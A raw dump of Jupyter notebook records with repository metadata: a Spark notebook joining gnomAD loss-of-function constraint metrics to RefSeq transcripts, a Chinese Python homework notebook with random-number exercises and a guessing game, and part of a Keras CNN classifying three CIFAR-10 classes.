"markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
cb1e05abede1eaabd2f74c1491adccd2a5afcb9b
59,861
ipynb
Jupyter Notebook
notebook/rnaStability_10.5.1_Step05_gnomAD_pLI.ipynb
nch-igm/rna-stability
eea0e83aa4c745c36ea6f76684b33908af03e4d9
[ "BSD-3-Clause" ]
6
2019-07-06T19:46:44.000Z
2021-06-02T15:29:33.000Z
notebook/rnaStability_10.5.1_Step05_gnomAD_pLI.ipynb
nch-igm/rna-stability
eea0e83aa4c745c36ea6f76684b33908af03e4d9
[ "BSD-3-Clause" ]
1
2019-08-15T15:44:26.000Z
2019-08-29T14:43:36.000Z
notebook/rnaStability_10.5.1_Step05_gnomAD_pLI.ipynb
nch-igm/rna-stability
eea0e83aa4c745c36ea6f76684b33908af03e4d9
[ "BSD-3-Clause" ]
null
null
null
32.322354
441
0.478341
[ [ [ "## Ensembl to RefSeq Mapping", "_____no_output_____" ], [ "The constraint table from gnomAD has duplicate gene ID's - in the example of TUBB3 one gene ID is missannotated. Given out analysis is by transcript, it is probably better to use the transcript table from gnomAD. Howver, gnomAD used ENSEMBL transcripts and we used RefSeq Transcripts. Can map the two through biomart:\n\nhttp://www.ensembl.org/biomart/martview/e81bf786e69482239d8e7799ec2c9e9e\n\n", "_____no_output_____" ] ], [ [ "import org.apache.spark.sql.{Row, SparkSession}\nimport org.apache.spark.sql.types._\nimport org.apache.spark.sql.functions._\nimport org.apache.spark.sql.expressions.Window", "_____no_output_____" ], [ "val customSchema = new StructType(Array(\n StructField(\"GeneID\",StringType,true),\n StructField(\"GeneIDVer\",StringType,true),\n StructField(\"TranscriptID\",StringType,true),\n StructField(\"TranscriptIDVer\",StringType,true),\n StructField(\"EnsemblGeneSymbol\",StringType,true),\n StructField(\"GeneType\",StringType,true),\n StructField(\"GENE\",StringType,true),\n StructField(\"RefSeq\",StringType,true),\n StructField(\"NCBIGeneID\",IntegerType,true)))", "_____no_output_____" ], [ "val df_ens2ref = (spark.read\n .format(\"csv\")\n .option(\"header\", \"true\")\n .option(\"delimiter\", \"\\t\")\n .option(\"nullValues\", \"\")\n .schema(customSchema)\n .load(\"s3://nch-igm-research-projects/rna_stability/peter/ensembl_2_refeq.txt\")\n )", "_____no_output_____" ], [ "df_ens2ref.printSchema", "_____no_output_____" ], [ "df_ens2ref.filter($\"GENE\" === \"TUBB3\").show", "_____no_output_____" ] ], [ [ "Double check there are no duplicates", "_____no_output_____" ] ], [ [ "val df_ref2ens = df_ens2ref.filter($\"RefSeq\".isNotNull).select(\"TranscriptID\",\"RefSeq\").sort($\"TranscriptID\").distinct", "_____no_output_____" ], [ "df_ref2ens.show", "_____no_output_____" ], [ "df_ref2ens.count", "_____no_output_____" ], [ "df_ref2ens.select($\"RefSeq\").distinct.count", "_____no_output_____" ], [ "df_ref2ens.groupBy($\"RefSeq\").count.sort($\"count\".desc).show", "_____no_output_____" ] ], [ [ "## gnomAD lof metrics by transcript", "_____no_output_____" ], [ "We want to link the data to gnomAD constraint metrics (LOEUF and pLI):\n\nSupplemental Table describing data fields:\n\nhttps://static-content.springer.com/esm/art%3A10.1038%2Fs41586-020-2308-7/MediaObjects/41586_2020_2308_MOESM1_ESM.pdf\n\nSelect the following columns from the main file:\n\n* **gene**: Gene name\n* **gene_id**: Ensembl gene ID\n* **transcript**: Ensembl transcript ID (Gencode v19)\n* **obs_mis**: Number of observed missense variants in transcript\n* **exp_mis**: Number of expected missense variants in transcript\n* **oe_mis**: Observed over expected ratio for missense variants in transcript (obs_mis divided by exp_mis)\n* **obs_syn**: Number of observed synonymous variants in transcript\n* **exp_syn**: Number of expected synonymous variants in transcript\n* **oe_syn**: Observed over expected ratio for missense variants in transcript (obs_syn divided by exp_syn)\n\n* **p**: The estimated proportion of haplotypes with a pLoF variant. Defined as: 1 -sqrt(no_lofs / defined)\n* **pLI**: Probability of loss-of-function intolerance; probability that transcript falls into distribution of haploinsufficient genes (~9% o/e pLoF ratio; computed from gnomAD data)\n\n* **pRec**: Probability that transcript falls into distribution of recessive genes (~46% o/e pLoF ratio; computed from gnomAD data)\n* **pNull**: Probability that transcript falls into distribution of unconstrained genes (~100% o/epLoF ratio; computed from gnomAD data)\n* **oe_lof_upper**: LOEUF: upper bound of 90% confidence interval for o/e ratio for pLoF variants (lower values indicate more constrained)\n* **oe_lof_upper_rank**: Transcript’s rank of LOEUF value compared to all transcripts (lower values indicate more constrained)\n* **oe_lof_upper_bin**: Decile bin of LOEUF for given transcript (lower values indicate more constrained)", "_____no_output_____" ] ], [ [ "val cols_constraint = Seq(\"gene\",\"gene_id\",\"transcript\",\"obs_mis\",\"exp_mis\",\"oe_mis\",\"obs_syn\",\"exp_syn\",\"oe_syn\",\n \"p\",\"pLI\",\"pRec\",\"pNull\",\"oe_lof_upper\",\"oe_lof_upper_rank\",\"oe_lof_upper_bin\")", "_____no_output_____" ], [ "val df_loft_import = (spark.read\n .format(\"csv\")\n .option(\"header\", \"true\")\n .option(\"delimiter\", \"\\t\")\n .option(\"inferSchema\", \"true\")\n .option(\"nullValues\", \"NA\")\n .option(\"nanValue=\", \"NA\")\n .load(\"s3://nch-igm-research-projects/rna_stability/peter/gnomad.v2.1.1.lof_metrics.by_transcript.txt\")\n .select(cols_constraint.map(col): _*)\n )", "_____no_output_____" ], [ "val df_loft = (df_loft_import.withColumn(\"p\",col(\"p\").cast(DoubleType))\n .withColumn(\"pLI\",col(\"pLI\").cast(DoubleType))\n .withColumn(\"pRec\",col(\"pRec\").cast(DoubleType))\n .withColumn(\"pNull\",col(\"pNull\").cast(DoubleType))\n .withColumn(\"oe_lof_upper\",col(\"oe_lof_upper\").cast(DoubleType))\n .withColumn(\"oe_lof_upper_rank\",col(\"oe_lof_upper_rank\").cast(IntegerType))\n .withColumn(\"oe_lof_upper_bin\",col(\"oe_lof_upper_bin\").cast(IntegerType))\n .withColumnRenamed(\"gene\", \"gnomadGeneSymbol\")\n .withColumnRenamed(\"gene_id\", \"gnomadGeneID\")\n .withColumnRenamed(\"transcript\", \"TranscriptID\") \n ) \ndf_loft.printSchema", "_____no_output_____" ], [ "df_loft.filter($\"gene\" === \"TUBB3\").show", "_____no_output_____" ] ], [ [ "Lets check that TranscriptID is not duplicated", "_____no_output_____" ] ], [ [ "df_loft.select($\"TranscriptID\").distinct.count", "_____no_output_____" ], [ "df_loft.count", "_____no_output_____" ], [ "df_loft.filter($\"p\".isNotNull && $\"pLI\" < 0.9).\n select(\"gnomadGeneSymbol\",\"p\",\"pLI\",\"oe_lof_upper\",\"oe_lof_upper_rank\",\"oe_lof_upper_bin\").sort($\"pLI\".desc).show", "_____no_output_____" ] ], [ [ "## Join gnomAD lof table to RefSeq to Ensembl table", "_____no_output_____" ] ], [ [ "val df_loft_ref = (df_loft.as(\"df_loft\")\n .join(df_ref2ens.as(\"df_ref2ens\"), $\"df_loft.TranscriptID\" === $\"df_ref2ens.TranscriptID\", \"inner\")\n .drop($\"df_ref2ens.TranscriptID\"))", "_____no_output_____" ] ], [ [ "Note that the number of rows has now increased from 80,950 to 95,806 - this is becuase ensemble transcripts can map to multiple RefSeq transcripts and vice versa. We now need to make a table where the RefSeq field is not duplicated.", "_____no_output_____" ] ], [ [ "df_loft_ref.groupBy($\"RefSeq\").count.sort($\"count\".desc).show", "_____no_output_____" ] ], [ [ "For duplicate RefSeq's we will choose the value with the highest pLI value (i.e. most contrained) and where pLI is the same lowest oef rank (i.e. most constrained).", "_____no_output_____" ] ], [ [ "df_loft_ref.filter($\"RefSeq\" === \"NM_206955\" || $\"RefSeq\" === \"NM_145021\").show", "_____no_output_____" ], [ "val df_high_pLI = df_loft_ref.groupBy($\"RefSeq\").agg(max($\"pLI\"), min($\"oe_lof_upper_rank\"))", "_____no_output_____" ], [ "df_high_pLI.filter($\"RefSeq\" === \"NM_206955\" || $\"RefSeq\" === \"NM_145021\").show", "_____no_output_____" ] ], [ [ "Finally, create a table with unique RefSeq by joining to high pLI table", "_____no_output_____" ] ], [ [ "val df_loft_ref_uniq = ( df_loft_ref.join(df_high_pLI.as(\"pli\"),\n df_loft_ref(\"RefSeq\") === df_high_pLI(\"RefSeq\") && \n df_loft_ref(\"pLI\") === df_high_pLI(\"max(pLI)\") &&\n df_loft_ref(\"oe_lof_upper_rank\") === df_high_pLI(\"min(oe_lof_upper_rank)\"),\n \"inner\")\n .drop($\"pli.RefSeq\").drop($\"pli.max(pLI)\").drop($\"pli.min(oe_lof_upper_rank)\") )", "_____no_output_____" ], [ "df_loft_ref_uniq.groupBy($\"RefSeq\").count.sort($\"count\".desc).show", "_____no_output_____" ], [ "df_loft_ref_uniq.orderBy(rand()).limit(10).show", "_____no_output_____" ] ], [ [ "Constrained genes are those with a pLi > 0.9", "_____no_output_____" ] ], [ [ "df_loft_ref_uniq.filter($\"pLi\" >= 0.9).groupBy($\"oe_lof_upper_bin\").count.sort($\"count\".desc).show", "_____no_output_____" ] ], [ [ "Probability that transcript falls into distribution of unconstrained genes", "_____no_output_____" ] ], [ [ "df_loft_ref_uniq.filter($\"pNull\" <= 0.05).groupBy($\"oe_lof_upper_bin\").count.sort($\"count\".desc).show", "_____no_output_____" ], [ "df_loft_ref_uniq.filter($\"pNull\" > 0.05).groupBy($\"oe_lof_upper_bin\").count.sort($\"count\".desc).show", "_____no_output_____" ] ], [ [ " Probability that transcript falls into distribution of recessive genes (~46% o/e pLoF ratio; computed from gnomAD data)", "_____no_output_____" ] ], [ [ "df_loft_ref_uniq.filter($\"pRec\" <= 0.05).groupBy($\"oe_lof_upper_bin\").count.sort($\"count\".desc).show", "_____no_output_____" ], [ "df_loft_ref_uniq.filter($\"pRec\" > 0.05).groupBy($\"oe_lof_upper_bin\").count.sort($\"count\".desc).show", "_____no_output_____" ] ], [ [ "### Write out gnomAD pLI with RefSeq Metrics", "_____no_output_____" ] ], [ [ "(df_loft_ref_uniq.write.mode(\"overwrite\")\n .parquet(\"s3://nch-igm-research-projects/rna_stability/peter/gnomAD_pLI_RefSeq.parquet\"))", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ] ]
cb1e0d5793910aa8539226b81d3a8381693f86f8
13,756
ipynb
Jupyter Notebook
chapter2/homework/localization/4-5/201611680168.ipynb
hpishacker/python_tutorial
9005f0db9dae10bdc1d1c3e9e5cf2268036cd5bd
[ "MIT" ]
76
2017-09-26T01:07:26.000Z
2021-02-23T03:06:25.000Z
chapter2/homework/localization/4-5/201611680168.ipynb
hpishacker/python_tutorial
9005f0db9dae10bdc1d1c3e9e5cf2268036cd5bd
[ "MIT" ]
5
2017-12-10T08:40:11.000Z
2020-01-10T03:39:21.000Z
chapter2/homework/localization/4-5/201611680168.ipynb
hacker-14/python_tutorial
4a110b12aaab1313ded253f5207ff263d85e1b56
[ "MIT" ]
112
2017-09-26T01:07:30.000Z
2021-11-25T19:46:51.000Z
26.814815
106
0.304958
[ [ [ "练习 1:求n个随机整数均值的平方根,整数范围在m与k之间。", "_____no_output_____" ] ], [ [ "import random, math\n\ndef test():\n i = 0\n total = 0\n average = 0\n number = random.randint(m, k)\n \n while i < n:\n i += 1\n total += number\n number = random.randint(m, k)\n print('随机数是:', number)\n average = int(total/n)\n \n return math.sqrt(average)\n \n#主程序\nm=int(input('请输入一个整数下限:'))\nk=int(input('请输入一个整数上限:'))\nn=int(input('随机整数的个数是:'))\ntest()", "请输入一个整数下限:3\n请输入一个整数上限:7\n随机整数的个数是:2\n随机数是: 4\n随机数是: 5\n" ] ], [ [ "练习 2:写函数,共n个随机整数,整数范围在m与k之间,(n,m,k由用户输入)。求1:西格玛log(随机整数),2:西格玛1/log(随机整数)", "_____no_output_____" ] ], [ [ "import random, math\n\ndef test1():\n i = 0\n total = 0\n number = random.randint(m,k)\n result = math.log10(number)\n \n while i < n:\n i += 1\n number = random.randint(m,k)\n print('执行1的随机整数是:', number)\n result += math.log10(number)\n \n return result \n \n \ndef test2():\n i = 0\n total = 0\n number = random.randint(m,k)\n result = 1/(math.log10(number))\n \n while i < n:\n i += 1\n number = random.randint(m,k)\n print('执行2的随机整数是:', number)\n result += 1/(math.log10(number))\n \n return result \n \n#主程序\nn = int(input('随机整数的个数是:'))\nm = int(input('请输入一个整数下限:'))\nk = int(input('请输入一个整数上限:'))\n\nprint()\nprint('执行1的结果是:', test1())\nprint()\nprint('执行2的结果是:', test2())", "随机整数的个数是:2\n请输入一个整数下限:1\n请输入一个整数上限:100\n\n执行1的随机整数是: 18\n执行1的随机整数是: 46\n执行1的结果是: 4.810124939475361\n\n执行2的随机整数是: 49\n执行2的随机整数是: 49\n执行2的结果是: 1.6962756445012634\n" ] ], [ [ "练习 3:写函数,求s=a+aa+aaa+aaaa+aa...a的值,其中a是[1,9]之间的随机整数。例如2+22+222+2222+22222(此时共有5个数相加),几个数相加由键盘输入。", "_____no_output_____" ] ], [ [ "import random\n\ndef test():\n a = random.randint(1,9)\n print('随机整数a是:', a)\n i = 0\n s = 0\n number = 0\n total = 0\n \n \n while i < n:\n s = 10**i\n number += a * s\n total += number\n i += 1\n \n return total\n\n#主程序\nn = int(input('需要相加的个数是:'))\nprint('结果是:', test())", "需要相加的个数是:4\n随机整数a是: 3\n结果是: 3702\n" ] ], [ [ "挑战性练习:仿照task5,将猜数游戏改成由用户随便选择一个整数,让计算机来猜测的猜数游戏,要求和task5中人猜测的方法类似,但是人机角色对换,由人来判断猜测是大、小还是相等,请写出完整的猜数游戏。", "_____no_output_____" ] ], [ [ "import random, math\n\n\ndef win():\n print(\n '''\n ======YOU WIN=======\n \n \n .\"\". .\"\",\n | | / /\n | | / /\n | | / /\n | |/ ;-._ \n } ` _/ / ;\n | /` ) / /\n | / /_/\\_/\\\n |/ / |\n ( ' \\ '- |\n \\ `. /\n | |\n | |\n \n ======YOU WIN=======\n '''\n )\n \ndef lose():\n print(\n '''\n ======YOU LOSE=======\n \n \n \n\n .-\" \"-.\n / \\\n | |\n |, .-. .-. ,|\n | )(__/ \\__)( |\n |/ /\\ \\|\n (@_ (_ ^^ _)\n _ ) \\_______\\__|IIIIII|__/__________________________\n (_)@8@8{}<________|-\\IIIIII/-|___________________________>\n )_/ \\ /\n (@ `--------`\n \n \n \n ======YOU LOSE=======\n '''\n )\n \ndef game_over():\n print(\n '''\n ======GAME OVER=======\n \n _________ \n / ======= \\ \n / __________\\ \n | ___________ | \n | | - | | \n | | | | \n | |_________| |________________ \n \\=____________/ ) \n / \"\"\"\"\"\"\"\"\"\"\" \\ / \n / ::::::::::::: \\ =D-' \n (_________________) \n\n \n ======GAME OVER=======\n '''\n )\n\ndef show_team():\n print('''\n ***声明***\n 本游戏由PXS小机智开发''')\n\ndef show_instruction():\n print('''\n 游戏说明\n玩家选择一个任意整数,计算机来猜测该数。\n若计算机在规定次数内猜中该数,则计算机获胜。\n若规定次数内没有猜中,则玩家获胜。''')\n \ndef menu():\n print('''\n =====游戏菜单=====\n 1. 游戏说明\n 2. 开始游戏\n 3. 退出游戏\n 4. 制作团队\n =====游戏菜单=====''') \n\ndef guess_game():\n n = int(input('请输入一个大于0的整数,作为神秘整数的上界,回车结束。'))\n max_times = int(math.log(n,2))\n print('规定猜测次数是:', max_times, '次')\n print()\n guess = random.randint(1, n)\n print('我猜这个数是:', guess)\n guess_times = 1\n max_number = n\n min_number = 1\n \n while guess_times < max_times:\n answer = input('我猜对了吗?(请输入“对”或“不对”)')\n if answer == '对':\n print(lose())\n break\n if answer == '不对':\n x = input('我猜大了还是小了?(请输入“大”或“小”)')\n print()\n if x == '大':\n max_number = guess-1\n guess = random.randint(min_number,max_number)\n print('我猜这个数是:', guess)\n guess_times += 1 \n print('我已经猜了', guess_times, '次')\n print()\n if guess_times == max_times:\n ask = input('''***猜测已达规定次数*** \n 我猜对了吗?(请输入“对”或“不对”)''')\n if ask == '不对':\n end()\n break\n else:\n lose()\n if x == '小':\n min_number = guess + 1\n guess = random.randint(min_number,max_number)\n print('我猜这个数是:', guess)\n guess_times += 1\n print('我已经猜了', guess_times, '次')\n print()\n if guess_times == max_times:\n ask = input('''***猜测已达规定次数*** \n 我猜对了吗?(请输入“对”或“不对”)''')\n if ask == '不对':\n end()\n break\n else:\n lose()\n \ndef end():\n a = input('你的神秘数字是:')\n print()\n print('原来是', a, '啊!')\n win()\n\n#主函数\ndef main():\n while True:\n menu()\n choice = int(input('请输入你的选择'))\n if choice == 1:\n show_instruction()\n elif choice == 2:\n guess_game()\n elif choice == 3:\n game_over()\n break\n else:\n show_team()\n\n\n#主程序\nif __name__ == '__main__':\n main()", "\n =====游戏菜单=====\n 1. 游戏说明\n 2. 开始游戏\n 3. 退出游戏\n 4. 制作团队\n =====游戏菜单=====\n请输入你的选择1\n\n 游戏说明\n玩家选择一个任意整数,计算机来猜测该数。\n若计算机在规定次数内猜中该数,则计算机获胜。\n若规定次数内没有猜中,则玩家获胜。\n\n =====游戏菜单=====\n 1. 游戏说明\n 2. 开始游戏\n 3. 退出游戏\n 4. 制作团队\n =====游戏菜单=====\n请输入你的选择4\n\n ***声明***\n 本游戏由PXS小机智开发\n\n =====游戏菜单=====\n 1. 游戏说明\n 2. 开始游戏\n 3. 退出游戏\n 4. 制作团队\n =====游戏菜单=====\n请输入你的选择2\n请输入一个大于0的整数,作为神秘整数的上界,回车结束。9\n规定猜测次数是: 3 次\n\n我猜这个数是: 1\n我猜对了吗?(请输入“对”或“不对”)不对\n我猜大了还是小了?(请输入“大”或“小”)小\n\n我猜这个数是: 2\n我已经猜了 2 次\n\n我猜对了吗?(请输入“对”或“不对”)不对\n我猜大了还是小了?(请输入“大”或“小”)小\n\n我猜这个数是: 9\n我已经猜了 3 次\n\n***猜测已达规定次数*** \n 我猜对了吗?(请输入“对”或“不对”)不对\n你的神秘数字是:8\n\n原来是 8 啊!\n\n ======YOU WIN=======\n \n \n .\"\". .\"\",\n | | / /\n | | / /\n | | / /\n | |/ ;-._ \n } ` _/ / ;\n | /` ) / /\n | / /_/\\_/ |/ / |\n ( ' \\ '- |\n \\ `. /\n | |\n | |\n \n ======YOU WIN=======\n \n\n =====游戏菜单=====\n 1. 游戏说明\n 2. 开始游戏\n 3. 退出游戏\n 4. 制作团队\n =====游戏菜单=====\n请输入你的选择3\n\n ======GAME OVER=======\n \n _________ \n / ======= \\ \n / __________\\ \n | ___________ | \n | | - | | \n | | | | \n | |_________| |________________ \n \\=____________/ ) \n / \"\"\"\"\"\"\"\"\"\"\" \\ / \n / ::::::::::::: \\ =D-' \n (_________________) \n\n \n ======GAME OVER=======\n \n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
cb1e2731f3886e4983bf3de09ed66cbdfb6c4557
184,400
ipynb
Jupyter Notebook
CNN_Keras_imageClassfier.ipynb
parthsaxena1909/Image-Classifer-using-CIFRA10
755991301701d2656dbc86a563b55a22eb0a06db
[ "MIT" ]
null
null
null
CNN_Keras_imageClassfier.ipynb
parthsaxena1909/Image-Classifer-using-CIFRA10
755991301701d2656dbc86a563b55a22eb0a06db
[ "MIT" ]
null
null
null
CNN_Keras_imageClassfier.ipynb
parthsaxena1909/Image-Classifer-using-CIFRA10
755991301701d2656dbc86a563b55a22eb0a06db
[ "MIT" ]
null
null
null
421.004566
52,110
0.924398
[ [ [ "<a href=\"https://colab.research.google.com/github/parthsaxena1909/Image-Classifer-using-CIFRA10/blob/master/CNN_Keras_imageClassfier.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ] ], [ [ "import tensorflow as tf\nimport os \nimport numpy as np\n\nfrom matplotlib import pyplot as plt\n%matplotlib inline \n\nif not os.path.isdir('models'):\n os.mkdir('models')\n\nprint('Tensorflow Version:', tf.__version__)\nprint('is using GPU?', tf.test.is_gpu_available())\n", "Tensorflow Version: 2.2.0\nWARNING:tensorflow:From <ipython-input-1-22f0592f0b90>:12: is_gpu_available (from tensorflow.python.framework.test_util) is deprecated and will be removed in a future version.\nInstructions for updating:\nUse `tf.config.list_physical_devices('GPU')` instead.\nis using GPU? False\n" ], [ "def get_three_classess(x,y):\n indices_0, _ = np.where(y==0.)\n indices_1, _ = np.where(y==1.)\n indices_2, _ = np.where(y==2.)\n\n indices = np.concatenate([indices_0, indices_1, indices_2], axis = 0)\n\n x = x[indices]\n y = y[indices]\n\n count = x.shape[0]\n indices = np.random.choice(range(count), count , replace = False )\n\n x = x[indices]\n y= y[indices]\n\n y = tf.keras.utils.to_categorical(y)\n\n return x,y \n \n\n", "_____no_output_____" ], [ "(x_train,y_train),(x_test,y_test) = tf.keras.datasets.cifar10.load_data()\nx_train,y_train = get_three_classess(x_train,y_train)\nx_test, y_test = get_three_classess(x_test,y_test)\nprint(x_train.shape,y_train.shape)\nprint(x_test.shape,y_test.shape)\n", "(15000, 32, 32, 3) (15000, 3)\n(3000, 32, 32, 3) (3000, 3)\n" ], [ "class_names = ['aeroplane','car','bird']\ndef show_random_examples(x,y,p):\n indices = np.random.choice(range(x.shape[0]), 10, replace = False)\n\n x=x[indices]\n y=y[indices]\n p=p[indices]\n plt.figure(figsize = (10,5))\n for i in range(10):\n plt.subplot(2,5,1+i)\n plt.imshow(x[i])\n plt.xticks([])\n plt.yticks([])\n col = 'green' if np.argmax(y[i]) == np.argmax(p[i]) else 'red'\n plt.xlabel(class_names[np.argmax(p[i])], color = col)\n plt.show()\nshow_random_examples(x_train,y_train,y_train)\n \n", "_____no_output_____" ], [ "show_random_examples(x_test,y_test,y_test)", "_____no_output_____" ], [ "from tensorflow.keras.layers import Conv2D, MaxPooling2D, BatchNormalization\nfrom tensorflow.keras.layers import Dropout, Flatten, Input,Dense\n\ndef create_model():\n def add_conv_block(model, num_filters):\n model.add(Conv2D(num_filters,3,activation='relu',padding='same'))\n model.add(BatchNormalization())\n model.add(Conv2D(num_filters,3,activation='relu',padding='valid'))\n model.add(MaxPooling2D(pool_size= 2))\n model.add(Dropout(0.5))\n return model\n\n model = tf.keras.models.Sequential()\n model.add(Input(shape=(32,32,3)))\n\n model = add_conv_block(model,32)\n model= add_conv_block(model,64)\n model = add_conv_block(model,128)\n model.add(Flatten())\n model.add(Dense(3,activation='softmax'))\n\n model.compile(\n loss = 'categorical_crossentropy',\n optimizer= 'adam', metrics=['accuracy']\n )\n return model \nmodel = create_model()\nmodel.summary()\n", "Model: \"sequential\"\n_________________________________________________________________\nLayer (type) Output Shape Param # \n=================================================================\nconv2d (Conv2D) (None, 32, 32, 32) 896 \n_________________________________________________________________\nbatch_normalization (BatchNo (None, 32, 32, 32) 128 \n_________________________________________________________________\nconv2d_1 (Conv2D) (None, 30, 30, 32) 9248 \n_________________________________________________________________\nmax_pooling2d (MaxPooling2D) (None, 15, 15, 32) 0 \n_________________________________________________________________\ndropout (Dropout) (None, 15, 15, 32) 0 \n_________________________________________________________________\nconv2d_2 (Conv2D) (None, 15, 15, 64) 18496 \n_________________________________________________________________\nbatch_normalization_1 (Batch (None, 15, 15, 64) 256 \n_________________________________________________________________\nconv2d_3 (Conv2D) (None, 13, 13, 64) 36928 \n_________________________________________________________________\nmax_pooling2d_1 (MaxPooling2 (None, 6, 6, 64) 0 \n_________________________________________________________________\ndropout_1 (Dropout) (None, 6, 6, 64) 0 \n_________________________________________________________________\nconv2d_4 (Conv2D) (None, 6, 6, 128) 73856 \n_________________________________________________________________\nbatch_normalization_2 (Batch (None, 6, 6, 128) 512 \n_________________________________________________________________\nconv2d_5 (Conv2D) (None, 4, 4, 128) 147584 \n_________________________________________________________________\nmax_pooling2d_2 (MaxPooling2 (None, 2, 2, 128) 0 \n_________________________________________________________________\ndropout_2 (Dropout) (None, 2, 2, 128) 0 \n_________________________________________________________________\nflatten (Flatten) (None, 512) 0 \n_________________________________________________________________\ndense (Dense) (None, 3) 1539 \n=================================================================\nTotal params: 289,443\nTrainable params: 288,995\nNon-trainable params: 448\n_________________________________________________________________\n" ], [ "h = model.fit(\n x_train/255.,y_train,\n validation_data=(x_test/255.,y_test),\n epochs=10, batch_size = 128,\n callbacks=[\n tf.keras.callbacks.EarlyStopping(monitor='val_accuracy',patience=3),\n tf.keras.callbacks.ModelCheckpoint(\n 'models/model_{val_accuracy:.3f}.h5',\n save_best_only=True, save_weights_only=False,\n monitor = 'val_accuracy'\n )\n ]\n)", "Epoch 1/10\n118/118 [==============================] - 85s 719ms/step - loss: 0.9064 - accuracy: 0.6742 - val_loss: 3.5118 - val_accuracy: 0.3333\nEpoch 2/10\n118/118 [==============================] - 85s 720ms/step - loss: 0.5638 - accuracy: 0.7707 - val_loss: 3.7951 - val_accuracy: 0.3333\nEpoch 3/10\n118/118 [==============================] - 85s 724ms/step - loss: 0.5050 - accuracy: 0.8001 - val_loss: 2.7839 - val_accuracy: 0.3777\nEpoch 4/10\n118/118 [==============================] - 85s 724ms/step - loss: 0.4514 - accuracy: 0.8190 - val_loss: 2.1426 - val_accuracy: 0.4347\nEpoch 5/10\n118/118 [==============================] - 85s 722ms/step - loss: 0.4194 - accuracy: 0.8333 - val_loss: 1.0153 - val_accuracy: 0.6487\nEpoch 6/10\n118/118 [==============================] - 84s 711ms/step - loss: 0.3790 - accuracy: 0.8480 - val_loss: 0.5955 - val_accuracy: 0.7653\nEpoch 7/10\n118/118 [==============================] - 85s 721ms/step - loss: 0.3519 - accuracy: 0.8635 - val_loss: 0.3499 - val_accuracy: 0.8637\nEpoch 8/10\n118/118 [==============================] - 85s 718ms/step - loss: 0.3308 - accuracy: 0.8715 - val_loss: 0.4008 - val_accuracy: 0.8570\nEpoch 9/10\n118/118 [==============================] - 85s 723ms/step - loss: 0.3151 - accuracy: 0.8777 - val_loss: 0.4777 - val_accuracy: 0.8183\nEpoch 10/10\n118/118 [==============================] - 85s 720ms/step - loss: 0.2912 - accuracy: 0.8881 - val_loss: 0.2930 - val_accuracy: 0.8770\n" ], [ "accs= h.history['accuracy']\nval_accs= h.history['val_accuracy']\nplt.plot(range(len(accs)),accs,label='Training')\nplt.plot(range(len(accs)),val_accs,label='Validation')\nplt.legend()\nplt.show()\n", "_____no_output_____" ], [ "model=tf.keras.models.load_model('models/model_0.877.h5')\npreds=model.predict(x_test/255.)\nshow_random_examples(x_test,y_test,preds)", 